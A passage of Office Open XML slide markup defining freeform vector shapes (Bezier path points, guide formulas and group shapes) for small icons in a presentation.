                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="177"/>
                    <a:pt x="136" y="177"/>
                    <a:pt x="136" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="105"/>
                    <a:pt x="195" y="46"/>
                    <a:pt x="268" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1133" y="46"/>
                    <a:pt x="1133" y="46"/>
                    <a:pt x="1133" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1206" y="46"/>
                    <a:pt x="1265" y="105"/>
                    <a:pt x="1265" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1265" y="1295"/>
                    <a:pt x="1265" y="1295"/>
                    <a:pt x="1265" y="1295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1265" y="1329"/>
                    <a:pt x="1247" y="1359"/>
                    <a:pt x="1219" y="1376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1220" y="1371"/>
                    <a:pt x="1220" y="1365"/>
                    <a:pt x="1220" y="1359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1220" y="580"/>
                    <a:pt x="1220" y="580"/>
                    <a:pt x="1220" y="580"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1220" y="568"/>
                    <a:pt x="1210" y="557"/>
                    <a:pt x="1197" y="557"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1185" y="557"/>
                    <a:pt x="1175" y="568"/>
                    <a:pt x="1175" y="580"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1175" y="1359"/>
                    <a:pt x="1175" y="1359"/>
                    <a:pt x="1175" y="1359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1175" y="1431"/>
                    <a:pt x="1116" y="1490"/>
                    <a:pt x="1043" y="1490"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="1490"/>
                    <a:pt x="177" y="1490"/>
                    <a:pt x="177" y="1490"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="1490"/>
                    <a:pt x="46" y="1431"/>
                    <a:pt x="46" y="1359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="1203"/>
                    <a:pt x="46" y="1203"/>
                    <a:pt x="46" y="1203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="1190"/>
                    <a:pt x="35" y="1180"/>
                    <a:pt x="23" y="1180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1180"/>
                    <a:pt x="0" y="1190"/>
                    <a:pt x="0" y="1203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1359"/>
                    <a:pt x="0" y="1359"/>
                    <a:pt x="0" y="1359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1457"/>
                    <a:pt x="79" y="1536"/>
                    <a:pt x="177" y="1536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1043" y="1536"/>
                    <a:pt x="1043" y="1536"/>
                    <a:pt x="1043" y="1536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1115" y="1536"/>
                    <a:pt x="1177" y="1493"/>
                    <a:pt x="1205" y="1431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267" y="1416"/>
                    <a:pt x="1311" y="1360"/>
                    <a:pt x="1311" y="1295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1311" y="177"/>
                    <a:pt x="1311" y="177"/>
                    <a:pt x="1311" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1311" y="79"/>
                    <a:pt x="1231" y="0"/>
                    <a:pt x="1133" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="282" y="514"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="514"/>
                    <a:pt x="78" y="514"/>
                    <a:pt x="78" y="514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="178"/>
                    <a:pt x="414" y="178"/>
                    <a:pt x="414" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="383"/>
                    <a:pt x="414" y="383"/>
                    <a:pt x="414" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="455"/>
                    <a:pt x="355" y="514"/>
                    <a:pt x="282" y="514"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="282" y="514"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="514"/>
                    <a:pt x="282" y="514"/>
                    <a:pt x="282" y="514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0" name="Freeform 394">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A46550A3-A663-48CD-89AE-FC9F4AEDDE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807212"/>
              <a:ext cx="222598" cy="12720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 22 w 778"/>
                <a:gd name="T1" fmla="*/ 45 h 45"/>
                <a:gd name="T2" fmla="*/ 756 w 778"/>
                <a:gd name="T3" fmla="*/ 45 h 45"/>
                <a:gd name="T4" fmla="*/ 778 w 778"/>
                <a:gd name="T5" fmla="*/ 23 h 45"/>
                <a:gd name="T6" fmla="*/ 756 w 778"/>
                <a:gd name="T7" fmla="*/ 0 h 45"/>
                <a:gd name="T8" fmla="*/ 22 w 778"/>
                <a:gd name="T9" fmla="*/ 0 h 45"/>
                <a:gd name="T10" fmla="*/ 0 w 778"/>
                <a:gd name="T11" fmla="*/ 23 h 45"/>
                <a:gd name="T12" fmla="*/ 22 w 778"/>
                <a:gd name="T13" fmla="*/ 45 h 45"/>
                <a:gd name="T14" fmla="*/ 22 w 778"/>
                <a:gd name="T15" fmla="*/ 45 h 45"/>
                <a:gd name="T16" fmla="*/ 22 w 778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5">
                  <a:moveTo>
                    <a:pt x="22" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="756" y="45"/>
                    <a:pt x="756" y="45"/>
                    <a:pt x="756" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="768" y="45"/>
                    <a:pt x="778" y="35"/>
                    <a:pt x="778" y="23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1" name="Freeform 395">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A09E7547-2FF0-42C9-8E60-FEF5A3722B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845371"/>
              <a:ext cx="222598" cy="12720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 22 w 778"/>
                <a:gd name="T1" fmla="*/ 46 h 46"/>
                <a:gd name="T2" fmla="*/ 756 w 778"/>
                <a:gd name="T3" fmla="*/ 46 h 46"/>
                <a:gd name="T4" fmla="*/ 778 w 778"/>
                <a:gd name="T5" fmla="*/ 23 h 46"/>
                <a:gd name="T6" fmla="*/ 756 w 778"/>
                <a:gd name="T7" fmla="*/ 0 h 46"/>
                <a:gd name="T8" fmla="*/ 22 w 778"/>
                <a:gd name="T9" fmla="*/ 0 h 46"/>
                <a:gd name="T10" fmla="*/ 0 w 778"/>
                <a:gd name="T11" fmla="*/ 23 h 46"/>
                <a:gd name="T12" fmla="*/ 22 w 778"/>
                <a:gd name="T13" fmla="*/ 46 h 46"/>
                <a:gd name="T14" fmla="*/ 22 w 778"/>
                <a:gd name="T15" fmla="*/ 46 h 46"/>
                <a:gd name="T16" fmla="*/ 22 w 778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6">
                  <a:moveTo>
                    <a:pt x="22" y="46"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="756" y="46"/>
                    <a:pt x="756" y="46"/>
                    <a:pt x="756" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="768" y="46"/>
                    <a:pt x="778" y="35"/>
                    <a:pt x="778" y="23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6"/>
                    <a:pt x="22" y="46"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="22" y="46"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="46"/>
                    <a:pt x="22" y="46"/>
                    <a:pt x="22" y="46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2" name="Freeform 396">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED12A379-659D-47A1-9732-D77DE93FA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732482"/>
              <a:ext cx="222598" cy="12720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 22 w 778"/>
                <a:gd name="T1" fmla="*/ 46 h 46"/>
                <a:gd name="T2" fmla="*/ 756 w 778"/>
                <a:gd name="T3" fmla="*/ 46 h 46"/>
                <a:gd name="T4" fmla="*/ 778 w 778"/>
                <a:gd name="T5" fmla="*/ 23 h 46"/>
                <a:gd name="T6" fmla="*/ 756 w 778"/>
                <a:gd name="T7" fmla="*/ 0 h 46"/>
                <a:gd name="T8" fmla="*/ 22 w 778"/>
                <a:gd name="T9" fmla="*/ 0 h 46"/>
                <a:gd name="T10" fmla="*/ 0 w 778"/>
                <a:gd name="T11" fmla="*/ 23 h 46"/>
                <a:gd name="T12" fmla="*/ 22 w 778"/>
                <a:gd name="T13" fmla="*/ 46 h 46"/>
                <a:gd name="T14" fmla="*/ 22 w 778"/>
                <a:gd name="T15" fmla="*/ 46 h 46"/>
                <a:gd name="T16" fmla="*/ 22 w 778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6">
                  <a:moveTo>
                    <a:pt x="22" y="46"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="756" y="46"/>
                    <a:pt x="756" y="46"/>
                    <a:pt x="756" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="768" y="46"/>
                    <a:pt x="778" y="36"/>
                    <a:pt x="778" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="11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36"/>
                    <a:pt x="10" y="46"/>
                    <a:pt x="22" y="46"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="22" y="46"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="46"/>
                    <a:pt x="22" y="46"/>
                    <a:pt x="22" y="46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3" name="Freeform 397">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E977B516-A336-4630-8131-2F3C6DF954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5130" y="4769052"/>
              <a:ext cx="222598" cy="14310"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 22 w 778"/>
                <a:gd name="T1" fmla="*/ 45 h 45"/>
                <a:gd name="T2" fmla="*/ 756 w 778"/>
                <a:gd name="T3" fmla="*/ 45 h 45"/>
                <a:gd name="T4" fmla="*/ 778 w 778"/>
                <a:gd name="T5" fmla="*/ 22 h 45"/>
                <a:gd name="T6" fmla="*/ 756 w 778"/>
                <a:gd name="T7" fmla="*/ 0 h 45"/>
                <a:gd name="T8" fmla="*/ 22 w 778"/>
                <a:gd name="T9" fmla="*/ 0 h 45"/>
                <a:gd name="T10" fmla="*/ 0 w 778"/>
                <a:gd name="T11" fmla="*/ 22 h 45"/>
                <a:gd name="T12" fmla="*/ 22 w 778"/>
                <a:gd name="T13" fmla="*/ 45 h 45"/>
                <a:gd name="T14" fmla="*/ 22 w 778"/>
                <a:gd name="T15" fmla="*/ 45 h 45"/>
                <a:gd name="T16" fmla="*/ 22 w 778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8" h="45">
                  <a:moveTo>
                    <a:pt x="22" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="756" y="45"/>
                    <a:pt x="756" y="45"/>
                    <a:pt x="756" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="768" y="45"/>
                    <a:pt x="778" y="35"/>
                    <a:pt x="778" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="10"/>
                    <a:pt x="768" y="0"/>
                    <a:pt x="75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5"/>
                    <a:pt x="10" y="45"/>
                    <a:pt x="22" y="45"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="22" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="45"/>
                    <a:pt x="22" y="45"/>
                    <a:pt x="22" y="45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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Groupe 276">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC07F0BB-F506-4669-93B0-B8E40D105006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9417976" y="2364118"/>
            <a:ext cx="241618" cy="327823"/>
            <a:chOff x="7192768" y="2746058"/>
            <a:chExt cx="315913" cy="428625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A069AFD-2579-4C52-9E53-394FC189BD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768" y="2819083"/>
              <a:ext cx="57150" cy="355600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 180 w 203"/>
                <a:gd name="T1" fmla="*/ 1227 h 1272"/>
                <a:gd name="T2" fmla="*/ 53 w 203"/>
                <a:gd name="T3" fmla="*/ 1227 h 1272"/>
                <a:gd name="T4" fmla="*/ 45 w 203"/>
                <a:gd name="T5" fmla="*/ 1219 h 1272"/>
                <a:gd name="T6" fmla="*/ 45 w 203"/>
                <a:gd name="T7" fmla="*/ 23 h 1272"/>
                <a:gd name="T8" fmla="*/ 23 w 203"/>
                <a:gd name="T9" fmla="*/ 0 h 1272"/>
                <a:gd name="T10" fmla="*/ 0 w 203"/>
                <a:gd name="T11" fmla="*/ 23 h 1272"/>
                <a:gd name="T12" fmla="*/ 0 w 203"/>
                <a:gd name="T13" fmla="*/ 1219 h 1272"/>
                <a:gd name="T14" fmla="*/ 53 w 203"/>
                <a:gd name="T15" fmla="*/ 1272 h 1272"/>
                <a:gd name="T16" fmla="*/ 180 w 203"/>
                <a:gd name="T17" fmla="*/ 1272 h 1272"/>
                <a:gd name="T18" fmla="*/ 203 w 203"/>
                <a:gd name="T19" fmla="*/ 1250 h 1272"/>
                <a:gd name="T20" fmla="*/ 180 w 203"/>
                <a:gd name="T21" fmla="*/ 1227 h 1272"/>
                <a:gd name="T22" fmla="*/ 180 w 203"/>
                <a:gd name="T23" fmla="*/ 1227 h 1272"/>
                <a:gd name="T24" fmla="*/ 180 w 203"/>
                <a:gd name="T25" fmla="*/ 1227 h 1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" h="1272">
                  <a:moveTo>
                    <a:pt x="180" y="1227"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="1227"/>
                    <a:pt x="53" y="1227"/>
                    <a:pt x="53" y="1227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="1227"/>
                    <a:pt x="45" y="1224"/>
                    <a:pt x="45" y="1219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11"/>
                    <a:pt x="35" y="0"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1219"/>
                    <a:pt x="0" y="1219"/>
                    <a:pt x="0" y="1219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1248"/>
                    <a:pt x="24" y="1272"/>
                    <a:pt x="53" y="1272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="1272"/>
                    <a:pt x="180" y="1272"/>
                    <a:pt x="180" y="1272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="1272"/>
                    <a:pt x="203" y="1262"/>
                    <a:pt x="203" y="1250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1237"/>
                    <a:pt x="192" y="1227"/>
                    <a:pt x="180" y="1227"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="180" y="1227"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="1227"/>
                    <a:pt x="180" y="1227"/>
                    <a:pt x="180" y="1227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6" name="Freeform 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6FACB2B-D428-4602-8A42-0BB10ED11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64206" y="3114358"/>
              <a:ext cx="244475" cy="60325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 854 w 876"/>
                <a:gd name="T1" fmla="*/ 0 h 216"/>
                <a:gd name="T2" fmla="*/ 831 w 876"/>
                <a:gd name="T3" fmla="*/ 23 h 216"/>
                <a:gd name="T4" fmla="*/ 831 w 876"/>
                <a:gd name="T5" fmla="*/ 163 h 216"/>
                <a:gd name="T6" fmla="*/ 824 w 876"/>
                <a:gd name="T7" fmla="*/ 171 h 216"/>
                <a:gd name="T8" fmla="*/ 22 w 876"/>
                <a:gd name="T9" fmla="*/ 171 h 216"/>
                <a:gd name="T10" fmla="*/ 0 w 876"/>
                <a:gd name="T11" fmla="*/ 194 h 216"/>
                <a:gd name="T12" fmla="*/ 22 w 876"/>
                <a:gd name="T13" fmla="*/ 216 h 216"/>
                <a:gd name="T14" fmla="*/ 824 w 876"/>
                <a:gd name="T15" fmla="*/ 216 h 216"/>
                <a:gd name="T16" fmla="*/ 876 w 876"/>
                <a:gd name="T17" fmla="*/ 163 h 216"/>
                <a:gd name="T18" fmla="*/ 876 w 876"/>
                <a:gd name="T19" fmla="*/ 23 h 216"/>
                <a:gd name="T20" fmla="*/ 854 w 876"/>
                <a:gd name="T21" fmla="*/ 0 h 216"/>
                <a:gd name="T22" fmla="*/ 854 w 876"/>
                <a:gd name="T23" fmla="*/ 0 h 216"/>
                <a:gd name="T24" fmla="*/ 854 w 876"/>
                <a:gd name="T25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6" h="216">
                  <a:moveTo>
                    <a:pt x="854" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="841" y="0"/>
                    <a:pt x="831" y="11"/>
                    <a:pt x="831" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="831" y="163"/>
                    <a:pt x="831" y="163"/>
                    <a:pt x="831" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="831" y="168"/>
                    <a:pt x="828" y="171"/>
                    <a:pt x="824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10" y="171"/>
                    <a:pt x="0" y="181"/>
                    <a:pt x="0" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="206"/>
                    <a:pt x="10" y="216"/>
                    <a:pt x="22" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="824" y="216"/>
                    <a:pt x="824" y="216"/>
                    <a:pt x="824" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="852" y="216"/>
                    <a:pt x="876" y="192"/>
                    <a:pt x="876" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="876" y="23"/>
                    <a:pt x="876" y="23"/>
                    <a:pt x="876" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="876" y="11"/>
                    <a:pt x="866" y="0"/>
                    <a:pt x="854" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="854" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="854" y="0"/>
                    <a:pt x="854" y="0"/>
                    <a:pt x="854" y="0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7" name="Freeform 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0369593-B35E-4458-B43D-92C2B9711E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2768" y="2746058"/>
              <a:ext cx="315913" cy="354013"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 949 w 1131"/>
                <a:gd name="T1" fmla="*/ 0 h 1270"/>
                <a:gd name="T2" fmla="*/ 926 w 1131"/>
                <a:gd name="T3" fmla="*/ 67 h 1270"/>
                <a:gd name="T4" fmla="*/ 881 w 1131"/>
                <a:gd name="T5" fmla="*/ 67 h 1270"/>
                <a:gd name="T6" fmla="*/ 859 w 1131"/>
                <a:gd name="T7" fmla="*/ 0 h 1270"/>
                <a:gd name="T8" fmla="*/ 757 w 1131"/>
                <a:gd name="T9" fmla="*/ 22 h 1270"/>
                <a:gd name="T10" fmla="*/ 735 w 1131"/>
                <a:gd name="T11" fmla="*/ 90 h 1270"/>
                <a:gd name="T12" fmla="*/ 712 w 1131"/>
                <a:gd name="T13" fmla="*/ 22 h 1270"/>
                <a:gd name="T14" fmla="*/ 611 w 1131"/>
                <a:gd name="T15" fmla="*/ 0 h 1270"/>
                <a:gd name="T16" fmla="*/ 588 w 1131"/>
                <a:gd name="T17" fmla="*/ 67 h 1270"/>
                <a:gd name="T18" fmla="*/ 543 w 1131"/>
                <a:gd name="T19" fmla="*/ 67 h 1270"/>
                <a:gd name="T20" fmla="*/ 521 w 1131"/>
                <a:gd name="T21" fmla="*/ 0 h 1270"/>
                <a:gd name="T22" fmla="*/ 419 w 1131"/>
                <a:gd name="T23" fmla="*/ 22 h 1270"/>
                <a:gd name="T24" fmla="*/ 396 w 1131"/>
                <a:gd name="T25" fmla="*/ 90 h 1270"/>
                <a:gd name="T26" fmla="*/ 374 w 1131"/>
                <a:gd name="T27" fmla="*/ 22 h 1270"/>
                <a:gd name="T28" fmla="*/ 272 w 1131"/>
                <a:gd name="T29" fmla="*/ 0 h 1270"/>
                <a:gd name="T30" fmla="*/ 250 w 1131"/>
                <a:gd name="T31" fmla="*/ 67 h 1270"/>
                <a:gd name="T32" fmla="*/ 205 w 1131"/>
                <a:gd name="T33" fmla="*/ 67 h 1270"/>
                <a:gd name="T34" fmla="*/ 182 w 1131"/>
                <a:gd name="T35" fmla="*/ 0 h 1270"/>
                <a:gd name="T36" fmla="*/ 0 w 1131"/>
                <a:gd name="T37" fmla="*/ 52 h 1270"/>
                <a:gd name="T38" fmla="*/ 23 w 1131"/>
                <a:gd name="T39" fmla="*/ 213 h 1270"/>
                <a:gd name="T40" fmla="*/ 45 w 1131"/>
                <a:gd name="T41" fmla="*/ 52 h 1270"/>
                <a:gd name="T42" fmla="*/ 160 w 1131"/>
                <a:gd name="T43" fmla="*/ 45 h 1270"/>
                <a:gd name="T44" fmla="*/ 227 w 1131"/>
                <a:gd name="T45" fmla="*/ 135 h 1270"/>
                <a:gd name="T46" fmla="*/ 295 w 1131"/>
                <a:gd name="T47" fmla="*/ 45 h 1270"/>
                <a:gd name="T48" fmla="*/ 329 w 1131"/>
                <a:gd name="T49" fmla="*/ 67 h 1270"/>
                <a:gd name="T50" fmla="*/ 464 w 1131"/>
                <a:gd name="T51" fmla="*/ 67 h 1270"/>
                <a:gd name="T52" fmla="*/ 498 w 1131"/>
                <a:gd name="T53" fmla="*/ 45 h 1270"/>
                <a:gd name="T54" fmla="*/ 566 w 1131"/>
                <a:gd name="T55" fmla="*/ 135 h 1270"/>
                <a:gd name="T56" fmla="*/ 633 w 1131"/>
                <a:gd name="T57" fmla="*/ 45 h 1270"/>
                <a:gd name="T58" fmla="*/ 667 w 1131"/>
                <a:gd name="T59" fmla="*/ 67 h 1270"/>
                <a:gd name="T60" fmla="*/ 802 w 1131"/>
                <a:gd name="T61" fmla="*/ 67 h 1270"/>
                <a:gd name="T62" fmla="*/ 836 w 1131"/>
                <a:gd name="T63" fmla="*/ 45 h 1270"/>
                <a:gd name="T64" fmla="*/ 904 w 1131"/>
                <a:gd name="T65" fmla="*/ 135 h 1270"/>
                <a:gd name="T66" fmla="*/ 971 w 1131"/>
                <a:gd name="T67" fmla="*/ 45 h 1270"/>
                <a:gd name="T68" fmla="*/ 1086 w 1131"/>
                <a:gd name="T69" fmla="*/ 52 h 1270"/>
                <a:gd name="T70" fmla="*/ 1109 w 1131"/>
                <a:gd name="T71" fmla="*/ 1270 h 1270"/>
                <a:gd name="T72" fmla="*/ 1131 w 1131"/>
                <a:gd name="T73" fmla="*/ 52 h 1270"/>
                <a:gd name="T74" fmla="*/ 1079 w 1131"/>
                <a:gd name="T75" fmla="*/ 0 h 1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31" h="1270">
                  <a:moveTo>
                    <a:pt x="1079" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="949" y="0"/>
                    <a:pt x="949" y="0"/>
                    <a:pt x="949" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="937" y="0"/>
                    <a:pt x="926" y="10"/>
                    <a:pt x="926" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="926" y="67"/>
                    <a:pt x="926" y="67"/>
                    <a:pt x="926" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="926" y="80"/>
                    <a:pt x="916" y="90"/>
                    <a:pt x="904" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="892" y="90"/>
                    <a:pt x="881" y="80"/>
                    <a:pt x="881" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="881" y="22"/>
                    <a:pt x="881" y="22"/>
                    <a:pt x="881" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="881" y="10"/>
                    <a:pt x="871" y="0"/>
                    <a:pt x="859" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="780" y="0"/>
                    <a:pt x="780" y="0"/>
                    <a:pt x="780" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="767" y="0"/>
                    <a:pt x="757" y="10"/>
                    <a:pt x="757" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="757" y="67"/>
                    <a:pt x="757" y="67"/>
                    <a:pt x="757" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="757" y="80"/>
                    <a:pt x="747" y="90"/>
                    <a:pt x="735" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="722" y="90"/>
                    <a:pt x="712" y="80"/>
                    <a:pt x="712" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="712" y="22"/>
                    <a:pt x="712" y="22"/>
                    <a:pt x="712" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="712" y="10"/>
                    <a:pt x="702" y="0"/>
                    <a:pt x="690" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="611" y="0"/>
                    <a:pt x="611" y="0"/>
                    <a:pt x="611" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="598" y="0"/>
                    <a:pt x="588" y="10"/>
                    <a:pt x="588" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="588" y="67"/>
                    <a:pt x="588" y="67"/>
                    <a:pt x="588" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="588" y="80"/>
                    <a:pt x="578" y="90"/>
                    <a:pt x="566" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="553" y="90"/>
                    <a:pt x="543" y="80"/>
                    <a:pt x="543" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="22"/>
                    <a:pt x="543" y="22"/>
                    <a:pt x="543" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="10"/>
                    <a:pt x="533" y="0"/>
                    <a:pt x="521" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="441" y="0"/>
                    <a:pt x="441" y="0"/>
                    <a:pt x="441" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="0"/>
                    <a:pt x="419" y="10"/>
                    <a:pt x="419" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="419" y="67"/>
                    <a:pt x="419" y="67"/>
                    <a:pt x="419" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
